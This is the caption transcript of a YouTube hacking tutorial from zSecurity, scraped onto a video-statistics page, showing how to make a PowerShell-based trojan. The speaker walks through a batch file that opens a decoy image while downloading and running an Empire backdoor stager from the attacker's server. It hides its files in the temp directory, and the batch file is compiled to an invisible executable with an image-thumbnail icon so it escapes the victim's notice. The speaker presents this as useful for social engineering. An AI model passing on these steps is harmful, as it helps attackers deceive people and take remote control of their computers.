How to Create Trojans Using Powershell

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
hello everyone zade from zed security here and in today's video i'm going to show you how to easily and quickly create trojans a trojan is a file that looks and behaves like a normal file like an image or a pdf but when executed it runs evil code in the background like a back door or a keylogger therefore it's very very useful in social engineering show some love by smashing that like button subscribe to the channel if you haven't done so already and let's go before we jump into the video i'd like to take a moment to thank our sponsor datacamp datacamp is like a one-stop shop for data science courses it is a learning platform that is specially designed to teach you data science from programming to machine learning to data engineering you can pretty much start with no skills at all and become an expert in the field they've got a really cool platform that makes the learning process fun and easy so if you want to learn data science then make sure you check them out use the link in the description you'll get free access to the first chapter of any course across the whole platform so the goal is to generate a trojan and what we mean by a trojan is a file that opens up a normal file that the target person should be interested in this can be an image a pdf or anything you want but at the same time in the background execute code for a backdoor a key logger a credential harvester or anything that is useful to you as a hacker let me show you a quick example right here i have two files and as you can see both of them look like they are images they are an image of the recent poster of the new matrix movie you should check it out it looks very interesting but one of them is an actual image and the other is a trojan let me show you the difference so if i just run an image you can see we're just gonna see the image now if i close this and run the trojan which has the same icon actually looks like an image and if i double click it i will also get the image so the behavior is identical to an actual real image but at the same time running this file right here runs evil code in the background it's code for a backdoor for an empire stager and sends a connection here to my kali machine so right now i can interact with this agent and i have remote control over that computer and i can do anything i want on this windows computer this one right here so i can access its webcam it's file system download and upload and do anything that the normal user can do and as you can see we did this using a normal file that looks like a normal image and like i said earlier you can do this with any file type like a pdf or word document or anything else now the idea of hacking computers using trojans is not new it existed for very long and there are so many ways to do it i covered it in my ethical hacking course i covered more ways in my social engineering course and i even covered how to manually code everything in my python and hacking course so check them out if you want to learn more about this and learn it in details but i'm going to teach you a quick way of doing that using powershell in this video so all you'll need to do this is one powershell command or function that allows us to download a file from a specified url and save it on desk as the name that you specify in here now we're going to run this command twice one time to download the actual image that we want the user to see like the matrix image in here or the pdf or anything you want and the second time we're gonna be downloading the evil file which could be a back door or a key logger or anything else you want to run in the background very very easy let's do it step by step just to make sure that everything is going to work the way we want it so let's test this functionality first of all so i'm going to go to my browser and find an image or a pdf that i want to display to the user and you want to make sure that the link that you use is a direct url so you can access that resource directly it won't view the resource inside the html page so right here i have a direct link to that matrix image so i'm simply going to copy it and i'm going to go back to my notepad and we're just gonna paste it in here as the url and finally we're gonna store this the out file as and let's call it matrix.png so we're downloading a file from this url and we're storing it on disk with the following file name so if we just copy this and open up a powershell prompt so we're just going to type powershell and right now we are in this specific path so i'm actually just going to navigate to the desktop so i'm going to do cd desktop to navigate to the desktop you can see we are on the desktop now and i'm just going to paste the command that i copied so i'm just going to right click in here and i'm going to hit enter to execute it as you can see it's downloading the file we can already see it in here and here we go now we have the image downloaded on our desktop so now we know that this function actually works as expected and we can use it to download a file from the specified url and stay and save it in the current working directory so that's very very good so i'm gonna delete this file and all we have to do right now is use this command twice like i said download the file that you want to display to the user first open it and then download the file that you want to run in the background and open it so this is basically a download and execute payload then we're going to store everything in a bat file a bat file is a file that contains a number of commands that get automatically executed when the user double click it bat files can only run system commands not powershell commands therefore because this is a powershell and we executed it in the powershell prompt we will have to actually type powershell before the command and then we're going to say the powershell command that we want to run is this command and we're going to enclose it by double quotes at the start and at the end so basically all we're saying right here that we want to execute the following command the command that we just run in the powershell prompt as a powershell command and we're doing this by specifying the dash command argument then we know that this command is going to download the file and it's actually going to store it on disk with the following name matrix.png so the next thing we'll want to do is actually run that file execute it so the user sees it on their screen so we're simply just going to type the file name the matrix.png because that file is downloaded now on desk next we're going to need to do the second step which is download the file that we want to run in the background and execute it on the system so you're gonna need to create a backdoor i'm not gonna cover it in this video because it's gonna become very long i cover it on youtube and on my courses in multiple places and i even cover how to create and program your own backdoor in my python course so feel free to go to youtube google or watch my courses to create your evil file or even if you want to create a key logger like i said i'm using a ready one it's already hosted on my own apache server on windows so i'm simply just going to copy its url right here it's an empire stager and we're simply going to paste its code in here so i'm first going to need to run the exact same command as we have in here and we're going to replace the image url this time with the link to the empire stager so i'm just going to need to get it again from here copy link and we're going to paste it in here and obviously we don't want to store it as matrix.png we're actually going to start as a batch file as well so we're just going to call it empire.but now obviously you can use different names this file being a bat file we can actually embed all of the code in here within it but i'm just trying to show you a generic way that you can use with multiple scenarios so now this link is going to download the back door for us or the stager or the evil file and the next step is going to be to execute that file again exactly like we did in here we downloaded matrix.png from this url and then we run it and then we download the backdoor in this line we're saving it as empire.bot and we're going to run it by simply typing empire.but and that's it we're ready the only thing is once this is executed as we seen when we executed this powershell command the image was downloaded in the working directory in the desktop therefore if the target downloads this in their downloads and run the trojan they will actually see the image file being downloaded and the backdoor being downloaded to that working directory so they will see new files being displayed in their file and here in their folder in here and therefore that will be suspicious so what we're going to do before doing anything we're actually going to change our working directory exactly the same way that we did in here when we did cd desktop but instead instead of going to the desktop which is a place that the user sees a lot we're actually going to go to the temp directory so we're going to do cd temp and we're using the percentage signs in here to tell the operating system to navigate to the temp path regardless of where that temp path is so we're using the environment temp variable and that's it we're actually ready to go we're going to first of all go to the temp directory download an image or any file that you want to display to the user open the file download an evil file open it again and you can do this multiple times if you want to open a number of evil files or a number of things so this can be used in so many scenarios so once you're done we're going to save this and you just want to make sure that you set the type to all files and set the extension to a batch file so use whatever name you want so let's say matrix trojan this time and we're just going to call it dot but now obviously you don't want to tell the user that this is a trojan we're just doing this in the video and that's it we're done let's select a place to save it let's save it on my desktop that's fine and i'm going to save it there and that's it we're ready let's go ahead and execute it so we're gonna minimize this close this minimize and close and i'm just gonna go to my kali machine and actually kill my connection at the moment so we're just gonna go back and we're gonna do kill all so that i don't have any connections so if we list you'll see we've got nothing right now and let's just go ahead and run this and perfect as you can see it's downloading the image first and then it's running it now obviously preferably you'd want to use a file that is not that big so it's downloaded and executed quickly but as you can see we can see the image on file we don't see any strange files in here because we stored everything in the temp directory and our if our evil code got executed in the background i should have got an agent in here and sure enough as you can see i get a connection through my empire so now i can remotely control that windows machine from here now i know what you're thinking this file right here looks very very suspicious it doesn't look like the trojan that i showed you at the start of the video not only that but if you right click this file and open it in a text editor you will actually see the code inside it which is not very good the user is going to know that you're trying to do something suspicious therefore what you want to do at the end once you test it like this as a bat file is compile it to an executable similar to what we have in here and then give it an icon and also run it in the background because when we executed this we had a terminal window that we seen which is also very very suspicious so to address all of these issues all you have to do is compile it to an executable you can use a program like but to exe i will include its links in the resources so all you have to do is simply run the program open the bat file that you just created or you can simply just drag and drop it in here you can already see the code and all we want to do is tick the icon in here and select the icon that you want to use now if this was a pdf you can simply just download a generic pdf icon or a generic image icon but as you can see in windows if the file is an image you will actually see a thumbnail of the image similar to what we have in here therefore we're going to have to manually create an icon that looks like this image so to do that we're going to use an online service again there's a lot of these and simply you're just going to have to upload it so we have the image in our downloads and this is it we're gonna click on convert and download it we're gonna save it it's gonna go into my downloads so if i just look at it here very quickly you can see the icon in here so we're going to go back to our but to exe we already ticked the icon we're going to select the icon that we want which is in my downloads double click it and we're also going to change the exe format we're going to keep it at 32-bit but we're going to select the invisible option which will basically run the executable in the background without showing a terminal window so that it is less suspicious you can even ask it for uac and if you do then the backdoor is going to run as admin but we don't want to do that at this stage so i'm just going to click on convert in here to convert it to an executable for me and again we're just gonna store this on the desktop and this time let's call it matrix poster save everything is fine let's minimize and look at the file and perfect as you can see the file looks perfect it looks like an actual image with the thumbnail and before i run it i'm gonna kill my connection so again we're gonna do kill all y list to make sure we got nothing we have nothing and let's execute the file as you can see we did not see a terminal window so everything got executed in the background again we can see the image in here icon looks not suspicious at all but if we go to our kali machine we can see that we got a new connection so we can interact with this agent and we can go cmd sorry i mean shell to get a shell on that target system we can do pwd to see our working directory do it there to see where we are and from here like i said you have remote control over that computer and you can do anything you want and like i said earlier you don't have to always use an empire stager you can use any file and you can display any file to the user as well all you have to do is just simply download the files you want and execute them like so that's a quick and dirty way of doing this check out my courses or research google if you want to learn more and don't forget to subscribe to the channel and hit the bell to be updated every time we release a new video you
Info
Channel: zSecurity
Views: 129,484
Rating: 4.9030271 out of 5
Keywords: trojans, ethical hacking, hacking, metasploit, powershell-empire, kali, hack with image, backdoor image, backdoor, cyber security, zSecurity, powershell, bat, batch file, download and execute
Id: eiT7mslA63c
Channel Id: undefined
Length: 15min 53sec (953 seconds)
Published: Thu Sep 16 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.